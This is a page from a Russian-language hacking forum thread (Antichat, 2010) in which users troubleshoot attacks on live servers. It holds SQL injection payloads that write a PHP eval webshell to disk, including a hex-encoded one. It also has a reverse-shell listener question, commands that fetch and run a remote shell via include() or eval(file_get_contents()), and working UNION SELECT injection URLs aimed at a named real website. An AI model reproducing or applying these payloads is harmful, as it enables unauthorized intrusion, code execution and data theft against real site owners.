HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1447 из 2422 « Первая < 447947134713971437 1443 1444 1445 1446 1447 1448 1449 1450 1451 1457149715471947 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 18.08.2010, 05:09
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию
Цитата:
Сообщение от Gedj  
Заливаю шелл через sql и пишу +union+select+''+from+mysql.user+into+outfile+ту т путь
Фаил успешно заливается но при заходе на него пшет: Cannot execute a blank command in и путь
То есть при 232.php?cmd=phpinfo() просто выводиться пустая страница.
Что не так делаю?)
бро, system() это системная обалочка, если хочешь исполнять php код, надо через eval
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 18.08.2010, 05:18
Gedj
Познающий
Регистрация: 15.09.2008
Сообщений: 54
С нами: 9290631

Репутация: 46
По умолчанию
Сделал как ты сказал. Теперь при открытии файла ошибки нет а при cmd=phpinfo() выводит Parse error: syntax error, unexpected $end in и и дальше путь
 
Ответить с цитированием

  #3  
Старый 18.08.2010, 05:21
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию
Цитата:
Сообщение от Gedj  
Сделал как ты сказал. Теперь при открытии файла ошибки нет а при cmd=phpinfo()
;
выводит Parse error: syntax error, unexpected $end in и и дальше путь
попробуй захексить код

union+select+0x3c3f706870206576616c28245f4745545b5 c27636d645c275d29203f3e+into+outfile
 
Ответить с цитированием

  #4  
Старый 18.08.2010, 05:32
a1ertso
Новичок
Регистрация: 16.12.2009
Сообщений: 29
С нами: 8633638

Репутация: 0
По умолчанию
Сервер: Linux 2.6.26-2

При попытке бэк-конекта, командная строка просто висит пока не нажму отмена:



Цитата:
Сообщение от None  
listening on [any] 31337 ...
У меня Win 2000

Может фаервол сервера блокирует? Пробовал порт 80, тоже самое. В чем может быть проблема и есть ли решение?
 
Ответить с цитированием

  #5  
Старый 18.08.2010, 10:14
kfor
Участник форума
Регистрация: 01.09.2005
Сообщений: 194
С нами: 10889431

Репутация: 34
По умолчанию
Цитата:
Сообщение от Gedj  
Сделал как ты сказал. Теперь при открытии файла ошибки нет а при cmd=phpinfo() выводит Parse error: syntax error, unexpected $end in и и дальше путь
Если ты можешь писать значит можешь и читать. сделай LOAD_FILE и посмотри что у тебя туда падает. Для начала попробуй ''
 
Ответить с цитированием

  #6  
Старый 18.08.2010, 17:10
Gedj
Познающий
Регистрация: 15.09.2008
Сообщений: 54
С нами: 9290631

Репутация: 46
По умолчанию
Сервак Windows NT при заливке шела через sql пишу

Дальше при cmd=dir выводит директории

Вопрос как залить шел в Winows NT через cmd?
 
Ответить с цитированием

  #7  
Старый 18.08.2010, 17:49
InfectedM
Познающий
Регистрация: 04.11.2007
Сообщений: 51
С нами: 9746190

Репутация: 6
По умолчанию
http://www.lascos.com.ua/index.php?id=-1+union+select+concat_ws(0x3a,version())--

почему вот тут кидает на главную, что можно сделать?

http://www.lascos.com.ua/index.php?id=-1+union+select+concat_ws(0x3a,SCHEMA_NAME)+from+in formation_schema.SCHEMATA+--+
 
Ответить с цитированием

  #8  
Старый 18.08.2010, 17:49
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию
Цитата:
Сообщение от Gedj  
Сервак Windows NT при заливке шела через sql пишу
Дальше при cmd=dir выводит директории
Вопрос как залить шел в Winows NT через cmd?
мен ты мне другое говорил )) если eval то

cmd=copy($_GET,$_GET[d]);&s=http://твойсайт/shell.txt&d=/директория/shell.php;

потом локальный инклуд(если директория не видно из веб)

при allow_url_include=On

cmd=include("http://твойсайт/shell.txt");
 
Ответить с цитированием

  #9  
Старый 18.08.2010, 19:42
Redwood
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
С нами: 8772211

Репутация: 56
По умолчанию
Добавлю еще один способ.

Требования: allow_url_fopen = on

cmd=eval(file_get_contents('http://site.ru/shell.txt'));

Удалить php дескрипторы в начале и конце шелла.

Преимущества: не нужно знать папку на запись.

Недостатки: больше следит в логах
 
Ответить с цитированием

  #10  
Старый 18.08.2010, 19:46
kfor
Участник форума
Регистрация: 01.09.2005
Сообщений: 194
С нами: 10889431

Репутация: 34
По умолчанию
Цитата:
Сообщение от InfectedM  
http://www.lascos.com.ua/index.php?id=-1+union+select+concat_ws(0x3a,version())--
почему вот тут кидает на главную, что можно сделать?
http://www.lascos.com.ua/index.php?id=-1+union+select+concat_ws(0x3a,SCHEMA_NAME)+from+in formation_schema.SCHEMATA+--+
Короче это угар

Конечно, но благодаря ошибки и получасется вывод.

Вот так ты сможешь провдить инъекцию =)

http://www.lascos.com.ua/index.php?id=-1+union+select+concat_ws(0x3a,version(),SCHEMA_NAM E)+from+information_schema.SCHEMATA+LIMIT+1,2+--+
 
Ответить с цитированием
Ответ
Страница 1447 из 2422 « Первая < 447947134713971437 1443 1444 1445 1446 1447 1448 1449 1450 1451 1457149715471947 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.